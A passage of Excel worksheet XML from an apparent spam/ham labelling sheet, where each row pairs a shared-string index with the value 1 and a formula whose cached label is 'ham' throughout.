        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1509" t="s">
        <v>1093</v>
      </c>
      <c r="B1509">
        <v>1</v>
      </c>
      <c r="C1509" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1510" t="s">
        <v>1094</v>
      </c>
      <c r="B1510">
        <v>1</v>
      </c>
      <c r="C1510" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1511" t="s">
        <v>1095</v>
      </c>
      <c r="B1511">
        <v>1</v>
      </c>
      <c r="C1511" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1512" t="s">
        <v>21</v>
      </c>
      <c r="B1512">
        <v>1</v>
      </c>
      <c r="C1512" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1513" t="s">
        <v>1096</v>
      </c>
      <c r="B1513">
        <v>1</v>
      </c>
      <c r="C1513" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1514" t="s">
        <v>1097</v>
      </c>
      <c r="B1514">
        <v>1</v>
      </c>
      <c r="C1514" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1515" t="s">
        <v>1098</v>
      </c>
      <c r="B1515">
        <v>1</v>
      </c>
      <c r="C1515" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1516" t="s">
        <v>1099</v>
      </c>
      <c r="B1516">
        <v>1</v>
      </c>
      <c r="C1516" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1517" t="s">
        <v>1100</v>
      </c>
      <c r="B1517">
        <v>1</v>
      </c>
      <c r="C1517" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1518" t="s">
        <v>21</v>
      </c>
      <c r="B1518">
        <v>1</v>
      </c>
      <c r="C1518" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1519" t="s">
        <v>1101</v>
      </c>
      <c r="B1519">
        <v>1</v>
      </c>
      <c r="C1519" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1520" t="s">
        <v>1102</v>
      </c>
      <c r="B1520">
        <v>1</v>
      </c>
      <c r="C1520" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1521" t="s">
        <v>1103</v>
      </c>
      <c r="B1521">
        <v>1</v>
      </c>
      <c r="C1521" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1522" t="s">
        <v>1102</v>
      </c>
      <c r="B1522">
        <v>1</v>
      </c>
      <c r="C1522" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1523" t="s">
        <v>1104</v>
      </c>
      <c r="B1523">
        <v>1</v>
      </c>
      <c r="C1523" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1524" t="s">
        <v>1105</v>
      </c>
      <c r="B1524">
        <v>1</v>
      </c>
      <c r="C1524" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1525" t="s">
        <v>1106</v>
      </c>
      <c r="B1525">
        <v>1</v>
      </c>
      <c r="C1525" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1526" t="s">
        <v>21</v>
      </c>
      <c r="B1526">
        <v>1</v>
      </c>
      <c r="C1526" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1527" t="s">
        <v>1107</v>
      </c>
      <c r="B1527">
        <v>1</v>
      </c>
      <c r="C1527" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1528" t="s">
        <v>1108</v>
      </c>
      <c r="B1528">
        <v>1</v>
      </c>
      <c r="C1528" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1529" t="s">
        <v>1109</v>
      </c>
      <c r="B1529">
        <v>1</v>
      </c>
      <c r="C1529" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1530" t="s">
        <v>1110</v>
      </c>
      <c r="B1530">
        <v>1</v>
      </c>
      <c r="C1530" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1531" t="s">
        <v>1111</v>
      </c>
      <c r="B1531">
        <v>1</v>
      </c>
      <c r="C1531" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1532" t="s">
        <v>21</v>
      </c>
      <c r="B1532">
        <v>1</v>
      </c>
      <c r="C1532" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1533" t="s">
        <v>978</v>
      </c>
      <c r="B1533">
        <v>1</v>
      </c>
      <c r="C1533" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1534" t="s">
        <v>1112</v>
      </c>
      <c r="B1534">
        <v>1</v>
      </c>
      <c r="C1534" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1535" t="s">
        <v>1113</v>
      </c>
      <c r="B1535">
        <v>1</v>
      </c>
      <c r="C1535" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1536" t="s">
        <v>1064</v>
      </c>
      <c r="B1536">
        <v>1</v>
      </c>
      <c r="C1536" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1537" t="s">
        <v>1114</v>
      </c>
      <c r="B1537">
        <v>1</v>
      </c>
      <c r="C1537" t="str">
        <f t="shared" si="23"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1538" t="s">
        <v>21</v>
      </c>
      <c r="B1538">
        <v>1</v>
      </c>
      <c r="C1538" t="str">
        <f t="shared" ref="C1538:C1601" si="24">IF(B1538="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1539" t="s">
        <v>1115</v>
      </c>
      <c r="B1539">
        <v>1</v>
      </c>
      <c r="C1539" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1540" t="s">
        <v>1116</v>
      </c>
      <c r="B1540">
        <v>1</v>
      </c>
      <c r="C1540" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1541" t="s">
        <v>1117</v>
      </c>
      <c r="B1541">
        <v>1</v>
      </c>
      <c r="C1541" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1542" t="s">
        <v>1117</v>
      </c>
      <c r="B1542">
        <v>1</v>
      </c>
      <c r="C1542" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1543" t="s">
        <v>1118</v>
      </c>
      <c r="B1543">
        <v>1</v>
      </c>
      <c r="C1543" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1544" t="s">
        <v>1119</v>
      </c>
      <c r="B1544">
        <v>1</v>
      </c>
      <c r="C1544" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1545" t="s">
        <v>1120</v>
      </c>
      <c r="B1545">
        <v>1</v>
      </c>
      <c r="C1545" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1546" t="s">
        <v>1121</v>
      </c>
      <c r="B1546">
        <v>1</v>
      </c>
      <c r="C1546" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1547" t="s">
        <v>1122</v>
      </c>
      <c r="B1547">
        <v>1</v>
      </c>
      <c r="C1547" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1548" t="s">
        <v>1123</v>
      </c>
      <c r="B1548">
        <v>1</v>
      </c>
      <c r="C1548" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1549" t="s">
        <v>1124</v>
      </c>
      <c r="B1549">
        <v>1</v>
      </c>
      <c r="C1549" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1550" t="s">
        <v>1125</v>
      </c>
      <c r="B1550">
        <v>1</v>
      </c>
      <c r="C1550" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1551" t="s">
        <v>1096</v>
      </c>
      <c r="B1551">
        <v>1</v>
      </c>
      <c r="C1551" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1552" t="s">
        <v>1126</v>
      </c>
      <c r="B1552">
        <v>1</v>
      </c>
      <c r="C1552" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1553" t="s">
        <v>1127</v>
      </c>
      <c r="B1553">
        <v>1</v>
      </c>
      <c r="C1553" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1554" t="s">
        <v>1128</v>
      </c>
      <c r="B1554">
        <v>1</v>
      </c>
      <c r="C1554" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1555" t="s">
        <v>1128</v>
      </c>
      <c r="B1555">
        <v>1</v>
      </c>
      <c r="C1555" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1556" t="s">
        <v>1129</v>
      </c>
      <c r="B1556">
        <v>1</v>
      </c>
      <c r="C1556" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1557" t="s">
        <v>1130</v>
      </c>
      <c r="B1557">
        <v>1</v>
      </c>
      <c r="C1557" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1558" t="s">
        <v>1131</v>
      </c>
      <c r="B1558">
        <v>1</v>
      </c>
      <c r="C1558" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1559" t="s">
        <v>1132</v>
      </c>
      <c r="B1559">
        <v>1</v>
      </c>
      <c r="C1559" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1560" t="s">
        <v>1133</v>
      </c>
      <c r="B1560">
        <v>1</v>
      </c>
      <c r="C1560" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1561" t="s">
        <v>1134</v>
      </c>
      <c r="B1561">
        <v>1</v>
      </c>
      <c r="C1561" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1562" t="s">
        <v>1135</v>
      </c>
      <c r="B1562">
        <v>1</v>
      </c>
      <c r="C1562" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1563" t="s">
        <v>1136</v>
      </c>
      <c r="B1563">
        <v>1</v>
      </c>
      <c r="C1563" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1564" t="s">
        <v>1137</v>
      </c>
      <c r="B1564">
        <v>1</v>
      </c>
      <c r="C1564" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1565" t="s">
        <v>1138</v>
      </c>
      <c r="B1565">
        <v>1</v>
      </c>
      <c r="C1565" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1566" t="s">
        <v>21</v>
      </c>
      <c r="B1566">
        <v>1</v>
      </c>
      <c r="C1566" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1567" t="s">
        <v>1139</v>
      </c>
      <c r="B1567">
        <v>1</v>
      </c>
      <c r="C1567" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1568" t="s">
        <v>1140</v>
      </c>
      <c r="B1568">
        <v>1</v>
      </c>
      <c r="C1568" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1569" t="s">
        <v>1141</v>
      </c>
      <c r="B1569">
        <v>1</v>
      </c>
      <c r="C1569" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1570" t="s">
        <v>1142</v>
      </c>
      <c r="B1570">
        <v>1</v>
      </c>
      <c r="C1570" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1571" t="s">
        <v>21</v>
      </c>
      <c r="B1571">
        <v>1</v>
      </c>
      <c r="C1571" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1572" t="s">
        <v>1143</v>
      </c>
      <c r="B1572">
        <v>1</v>
      </c>
      <c r="C1572" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1573" t="s">
        <v>1144</v>
      </c>
      <c r="B1573">
        <v>1</v>
      </c>
      <c r="C1573" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1574" t="s">
        <v>21</v>
      </c>
      <c r="B1574">
        <v>1</v>
      </c>
      <c r="C1574" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1575" t="s">
        <v>1145</v>
      </c>
      <c r="B1575">
        <v>1</v>
      </c>
      <c r="C1575" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1576" t="s">
        <v>1146</v>
      </c>
      <c r="B1576">
        <v>1</v>
      </c>
      <c r="C1576" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1577" t="s">
        <v>1147</v>
      </c>
      <c r="B1577">
        <v>1</v>
      </c>
      <c r="C1577" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1578" t="s">
        <v>1148</v>
      </c>
      <c r="B1578">
        <v>1</v>
      </c>
      <c r="C1578" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1579" t="s">
        <v>1147</v>
      </c>
      <c r="B1579">
        <v>1</v>
      </c>
      <c r="C1579" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1580" t="s">
        <v>1149</v>
      </c>
      <c r="B1580">
        <v>1</v>
      </c>
      <c r="C1580" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1581" t="s">
        <v>21</v>
      </c>
      <c r="B1581">
        <v>1</v>
      </c>
      <c r="C1581" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1582" t="s">
        <v>21</v>
      </c>
      <c r="B1582">
        <v>1</v>
      </c>
      <c r="C1582" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1583" t="s">
        <v>21</v>
      </c>
      <c r="B1583">
        <v>1</v>
      </c>
      <c r="C1583" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1584" t="s">
        <v>1150</v>
      </c>
      <c r="B1584">
        <v>1</v>
      </c>
      <c r="C1584" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1585" t="s">
        <v>1151</v>
      </c>
      <c r="B1585">
        <v>1</v>
      </c>
      <c r="C1585" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1586" t="s">
        <v>1152</v>
      </c>
      <c r="B1586">
        <v>1</v>
      </c>
      <c r="C1586" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1587" t="s">
        <v>1153</v>
      </c>
      <c r="B1587">
        <v>1</v>
      </c>
      <c r="C1587" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1588" t="s">
        <v>1153</v>
      </c>
      <c r="B1588">
        <v>1</v>
      </c>
      <c r="C1588" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1589" t="s">
        <v>1154</v>
      </c>
      <c r="B1589">
        <v>1</v>
      </c>
      <c r="C1589" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1590" t="s">
        <v>1151</v>
      </c>
      <c r="B1590">
        <v>1</v>
      </c>
      <c r="C1590" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1591" t="s">
        <v>21</v>
      </c>
      <c r="B1591">
        <v>1</v>
      </c>
      <c r="C1591" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1592" t="s">
        <v>21</v>
      </c>
      <c r="B1592">
        <v>1</v>
      </c>
      <c r="C1592" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1593" t="s">
        <v>21</v>
      </c>
      <c r="B1593">
        <v>1</v>
      </c>
      <c r="C1593" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1594" t="s">
        <v>21</v>
      </c>
      <c r="B1594">
        <v>1</v>
      </c>
      <c r="C1594" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1595" t="s">
        <v>1155</v>
      </c>
      <c r="B1595">
        <v>1</v>
      </c>
      <c r="C1595" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1596" t="s">
        <v>1156</v>
      </c>
      <c r="B1596">
        <v>1</v>
      </c>
      <c r="C1596" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1597" t="s">
        <v>1157</v>
      </c>
      <c r="B1597">
        <v>1</v>
      </c>
      <c r="C1597" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1598" t="s">
        <v>1158</v>
      </c>
      <c r="B1598">
        <v>1</v>
      </c>
      <c r="C1598" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1599" t="s">
        <v>1159</v>
      </c>
      <c r="B1599">
        <v>1</v>
      </c>
      <c r="C1599" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1600" t="s">
        <v>1160</v>
      </c>
      <c r="B1600">
        <v>1</v>
      </c>
      <c r="C1600" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1601" t="s">
        <v>1161</v>
      </c>
      <c r="B1601">
        <v>1</v>
      </c>
      <c r="C1601" t="str">
        <f t="shared" si="24"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1602" t="s">
        <v>1161</v>
      </c>
      <c r="B1602">
        <v>1</v>
      </c>
      <c r="C1602" t="str">
        <f t="shared" ref="C1602:C1665" si="25">IF(B1602="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1603" t="s">
        <v>1162</v>
      </c>
      <c r="B1603">
        <v>1</v>
      </c>
      <c r="C1603" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1604" t="s">
        <v>1162</v>
      </c>
      <c r="B1604">
        <v>1</v>
      </c>
      <c r="C1604" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1605" t="s">
        <v>21</v>
      </c>
      <c r="B1605">
        <v>1</v>
      </c>
      <c r="C1605" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1606" t="s">
        <v>1163</v>
      </c>
      <c r="B1606">
        <v>1</v>
      </c>
      <c r="C1606" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1607" t="s">
        <v>1164</v>
      </c>
      <c r="B1607">
        <v>1</v>
      </c>
      <c r="C1607" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1608" t="s">
        <v>1165</v>
      </c>
      <c r="B1608">
        <v>1</v>
      </c>
      <c r="C1608" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1609" t="s">
        <v>1166</v>
      </c>
      <c r="B1609">
        <v>1</v>
      </c>
      <c r="C1609" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1610" t="s">
        <v>1167</v>
      </c>
      <c r="B1610">
        <v>1</v>
      </c>
      <c r="C1610" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1611" t="s">
        <v>1168</v>
      </c>
      <c r="B1611">
        <v>1</v>
      </c>
      <c r="C1611" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1612" t="s">
        <v>1169</v>
      </c>
      <c r="B1612">
        <v>1</v>
      </c>
      <c r="C1612" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1613" t="s">
        <v>1170</v>
      </c>
      <c r="B1613">
        <v>1</v>
      </c>
      <c r="C1613" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1614" t="s">
        <v>1171</v>
      </c>
      <c r="B1614">
        <v>1</v>
      </c>
      <c r="C1614" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1615" t="s">
        <v>21</v>
      </c>
      <c r="B1615">
        <v>1</v>
      </c>
      <c r="C1615" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1616" t="s">
        <v>1172</v>
      </c>
      <c r="B1616">
        <v>1</v>
      </c>
      <c r="C1616" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1617" t="s">
        <v>1173</v>
      </c>
      <c r="B1617">
        <v>1</v>
      </c>
      <c r="C1617" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1618" t="s">
        <v>1174</v>
      </c>
      <c r="B1618">
        <v>1</v>
      </c>
      <c r="C1618" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1619" t="s">
        <v>1175</v>
      </c>
      <c r="B1619">
        <v>1</v>
      </c>
      <c r="C1619" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1620" t="s">
        <v>1176</v>
      </c>
      <c r="B1620">
        <v>1</v>
      </c>
      <c r="C1620" t="str">
        <f t="shared" si="25"/>
        <v>ham</v>
      </c>
    </row>
